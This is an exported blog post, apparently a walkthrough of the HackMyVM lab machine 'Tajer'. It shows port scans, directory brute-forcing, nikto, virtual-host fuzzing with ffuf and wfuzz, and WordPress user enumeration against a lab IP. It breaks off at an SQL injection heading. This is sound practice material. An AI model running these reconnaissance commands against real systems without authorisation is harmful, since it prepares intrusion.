{"id":512,"date":"2024-04-06T18:41:33","date_gmt":"2024-04-06T10:41:33","guid":{"rendered":"http:\/\/162.14.82.114\/?p=512"},"modified":"2024-04-06T18:41:33","modified_gmt":"2024-04-06T10:41:33","slug":"hmv-_-tajer","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/512\/04\/06\/2024\/","title":{"rendered":"hmv[-_-]Tajer"},"content":{"rendered":"<h1>Tajer<\/h1>\n<p>Today I heard from the group admin that this one seems to be related to wifi, so let's give it a try:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840088.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840088.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406145815222\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>Information Gathering<\/h2>\n<h3>Port Scan<\/h3>\n<pre><code class=\"language-bash\">rustscan -a 172.20.10.4 -- -A <\/code><\/pre>\n<pre><code class=\"language-css\">PORT   STATE SERVICE REASON  VERSION\n22\/tcp open  ssh     syn-ack OpenSSH 8.4p1 Debian 5 (protocol 2.0)\n| ssh-hostkey: \n|   3072 27:71:24:58:d3:7c:b3:8a:7b:32:49:d1:c8:0b:4c:ba (RSA)\n| ssh-rsa 
AAAAB3NzaC1yc2EAAAADAQABAAABgQCjRCpLEF00zJy\/GkOtP8umEO3vDUpsiovHmmmfKN5njf5d4aqXBW3wUjqVL3VotabyslG6gNZnaPODVt2z3MdHsyNBuJZrbRrN26Dmz3x6pzJPnizxq2AXGzfgL89jQi83yr72gb2FpxGXm8BqYTTXwbiF7NIi+ekTmRWBa6LUQHgirqggrUq5xdmj0lTu+lMQ2Tzy4xfL6BKgyg4IaZlO9Kz9Z02ghG6VDr2vV9aInO4gu\/i2nlvM+aErvWyREoqspjvhgPd0Q950AkOkKfjD5hHxLFZo7aR3PHJev+8zrKwsv\/6bUAQIl8nUYifu\/a+1vpSddyl37ikQNLY7RsCboBNtPryz7czF1UUtWMlICTHegrchZT3FEr+c5g51hEj+AkwwQoan2y8SCMhKIbWQQH0qBWNXnfNpKGS5y8Vn8s6KqZlsPq49\/k9Pmr0jplaqgKDrPuiddGOehu5Yh6Fg5jsk5c5zXttWY17TyJdeab1LBOBJMY2ur4ZnSh+zv7E=\n|   256 e2:30:67:38:7b:db:9a:86:21:01:3e:bf:0e:e7:4f:26 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOAIZW58yN\/LbK35zNnyYvo4vNm1bnBkyDn4KzLYYyGBG2owUbmMp8WcmKWxT5ImSPDUE24mlhafaDEb8smp1Mc=\n|   256 5d:78:c5:37:a8:58:dd:c4:b6:bd:ce:b5:ba:bf:53:dc (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIB57U+4lDKyoTXGtTCBdDtmnL1YvIhNjQpbp\/tdjDYGx\n80\/tcp open  http    syn-ack nginx 1.18.0\n| http-methods: \n|_  Supported Methods: GET HEAD\n|_http-title: Welcome to nginx!\n|_http-server-header: nginx\/1.18.0\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h3>Directory Scan<\/h3>\n<pre><code class=\"language-bash\">gobuster dir -u http:\/\/172.20.10.4 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt <\/code><\/pre>\n<pre><code class=\"language-css\">===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/172.20.10.4\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Timeout:                 
10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\nProgress: 220560 \/ 220561 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n<p>Nothing at all. Either DNS needs to be set up or there is some other trick...<\/p>\n<pre><code class=\"language-css\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~]\n\u2514\u2500$ sudo dirsearch -u http:\/\/172.20.10.4\/ -e* -i 200,300-399 2&gt;\/dev\/null\n[sudo] password for kali: \n  _|. _ _  _  _  _ _|_    v0.4.3\n (_||| _) (\/_(_|| (_| )\nExtensions: php, jsp, asp, aspx, do, action, cgi, html, htm, js, tar.gz | HTTP method: GET | Threads: 25 | Wordlist size: 14594\nOutput File: \/home\/kali\/reports\/http_172.20.10.4\/__24-04-06_03-01-31.txt\nTarget: http:\/\/172.20.10.4\/\n[03:01:31] Starting: \nTask Completed<\/code><\/pre>\n<p>Wow.....<\/p>\n<h3>Vulnerability Scan<\/h3>\n<pre><code class=\"language-bash\">nikto -h http:\/\/172.20.10.4<\/code><\/pre>\n<pre><code class=\"language-css\">- Nikto v2.5.0\n---------------------------------------------------------------------------\n+ Target IP:          172.20.10.4\n+ Target Hostname:    172.20.10.4\n+ Target Port:        80\n+ Start Time:         2024-04-06 03:03:02 (GMT-4)\n---------------------------------------------------------------------------\n+ Server: nginx\/1.18.0\n+ \/: The anti-clickjacking X-Frame-Options header is not present. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Headers\/X-Frame-Options\n+ \/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. 
See: https:\/\/www.netsparker.com\/web-vulnerability-scanner\/vulnerabilities\/missing-content-type-header\/\n+ No CGI Directories found (use &#039;-C all&#039; to force check all possible dirs)\n+ \/#wp-config.php#: #wp-config.php# file found. This file contains the credentials.\n+ 8102 requests: 0 error(s) and 3 item(s) reported on remote host\n+ End Time:           2024-04-06 03:03:10 (GMT-4) (8 seconds)\n---------------------------------------------------------------------------<\/code><\/pre>\n<h2>Vulnerability Discovery<\/h2>\n<h3>Reconnaissance<\/h3>\n<pre><code class=\"language-html\">&lt;!DOCTYPE html&gt;\n&lt;html&gt;\n&lt;head&gt;\n&lt;title&gt;Welcome to nginx!&lt;\/title&gt;\n&lt;style&gt;\n    body {\n        width: 35em;\n        margin: 0 auto;\n        font-family: Tahoma, Verdana, Arial, sans-serif;\n    }\n&lt;\/style&gt;\n&lt;\/head&gt;\n&lt;body&gt;\n&lt;h1&gt;Welcome to nginx!&lt;\/h1&gt;\n&lt;p&gt;If you see this page, the nginx web server is successfully installed and\nworking. 
Further configuration is required.&lt;\/p&gt;\n\n&lt;p&gt;For online documentation and support please refer to\n&lt;a href=&quot;http:\/\/nginx.org\/&quot;&gt;nginx.org&lt;\/a&gt;.&lt;br\/&gt;\nCommercial support is available at\n&lt;a href=&quot;http:\/\/nginx.com\/&quot;&gt;nginx.com&lt;\/a&gt;.&lt;\/p&gt;\n\n&lt;p&gt;&lt;em&gt;Thank you for using nginx.&lt;\/em&gt;&lt;\/p&gt;\n&lt;\/body&gt;\n&lt;\/html&gt;<\/code><\/pre>\n<p>....... Hmm<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840091.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840091.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406150436690\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Look for middleware vulnerabilities:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840092.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840092.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406150540318\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Unbelievable.....<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840093.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840093.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406150651767\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840094.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840094.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406150700945\" style=\"zoom:50%;\" 
\/><\/div><\/p>\n<p>??????? Looking at the information the scans returned: nothing at all... I then analyzed the request and response packets and found nothing:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840095.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840095.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406151334587\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840096.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840096.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406151351958\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Not sure whether this is useful: <a 
href=\"https:\/\/wiki.96.mk\/Web%E5%AE%89%E5%85%A8\/Nginx\/%EF%BC%88CVE-2020-12440%EF%BC%89Nginx%20%3C%3D%201.8.0%20%E8%AF%B7%E6%B1%82%E8%B5%B0%E7%A7%81\/\">https:\/\/wiki.96.mk\/Web%E5%AE%89%E5%85%A8\/Nginx\/%EF%BC%88CVE-2020-12440%EF%BC%89Nginx%20%3C%3D%201.8.0%20%E8%AF%B7%E6%B1%82%E8%B5%B0%E7%A7%81\/<\/a><\/p>\n<p>At this point I remembered I still had not looked at the <code>nikto<\/code> results; it found a <code>wp-config.php<\/code> file, so open it and take a look:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840097.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840097.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406152259788\" \/><\/div><\/p>\n<p>Name resolution is definitely in play! But I could not find it, and I can't just conjure it out of thin air... what a joke.. Other people's writeups don't mention where the hostname here comes from either.... So it's just a hard guess?<\/p>\n<pre><code class=\"language-apl\"># \/etc\/hosts\n172.20.10.4  tajer.hmv<\/code><\/pre>\n<p>It seems many players abroad habitually set up a DNS entry before starting a box, but I don't have that habit.<\/p>\n<h3>Information Gathering + Fuzzing<\/h3>\n<pre><code 
class=\"language-bash\">gobuster dir -u http:\/\/tajer.hmv -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt <\/code><\/pre>\n<pre><code class=\"language-css\">===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/tajer.hmv\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\nProgress: 220560 \/ 220561 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n<p>..... Time to fuzz. Because the scan was too slow, I ran two scanners at the same time:<\/p>\n<pre><code class=\"language-bash\">ffuf -u http:\/\/FUZZ.tajer.hmv -w \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-110000.txt <\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840098.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840098.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406154845977\" style=\"zoom:33%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">wfuzz -u http:\/\/tajer.FUZZ.hmv -w \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-20000.txt <\/code><\/pre>\n<p>But it threw an error:<\/p>\n<pre><code class=\"language-text\">Pycurl error 6: Could not resolve host: tajer.blog.hmv<\/code><\/pre>\n<p>Adjust the command and scan again:<\/p>\n<pre><code class=\"language-bash\">ffuf -u http:\/\/172.20.10.4 -w \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-20000.txt -H &quot;Host: FUZZ.tajer.hmv&quot; -fs 612<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840099.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840099.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406155902283\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">wfuzz -u http:\/\/tajer.FUZZ.hmv -w \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-20000.txt --ip 172.20.10.4 <\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840100.png'><img class=\"lazyload 
lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840100.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406155201087\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>That worked; now filter out the duplicate responses:<\/p>\n<pre><code class=\"language-bash\">wfuzz -u http:\/\/tajer.FUZZ.hmv -w \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-20000.txt --ip 172.20.10.4 --hw 69<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840101.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840101.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406155406987\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Got <code>tajer.wordpress.hmv<\/code>; I am already drenched in sweat.<\/p>\n<pre><code class=\"language-apl\">172.20.10.4   tajer.wordpress.hmv<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840103.png'><img 
class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840103.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406160041851\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>Awesome....<\/p>\n<h3>Second Round of Information Gathering<\/h3>\n<h4>Directory Scan<\/h4>\n<pre><code class=\"language-bash\">gobuster dir -u http:\/\/tajer.wordpress.hmv -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt<\/code><\/pre>\n<pre><code class=\"language-text\">\/wp-content           (Status: 301) [Size: 169] [--&gt; http:\/\/tajer.wordpress.hmv\/wp-content\/]\n\/wp-includes          (Status: 301) [Size: 169] [--&gt; http:\/\/tajer.wordpress.hmv\/wp-includes\/]\n\/wp-admin             (Status: 301) [Size: 169] [--&gt; http:\/\/tajer.wordpress.hmv\/wp-admin\/]<\/code><\/pre>\n<h4>wpscan Scan<\/h4>\n<pre><code class=\"language-bash\">wpscan --url http:\/\/tajer.wordpress.hmv\/ -e u<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840104.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840104.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406160614482\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840105.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840105.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406160454569\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h4>Trying SQL Injection<\/h4>\n<p>Check for related vulnerabilities:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840106.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840106.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406160659224\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' 
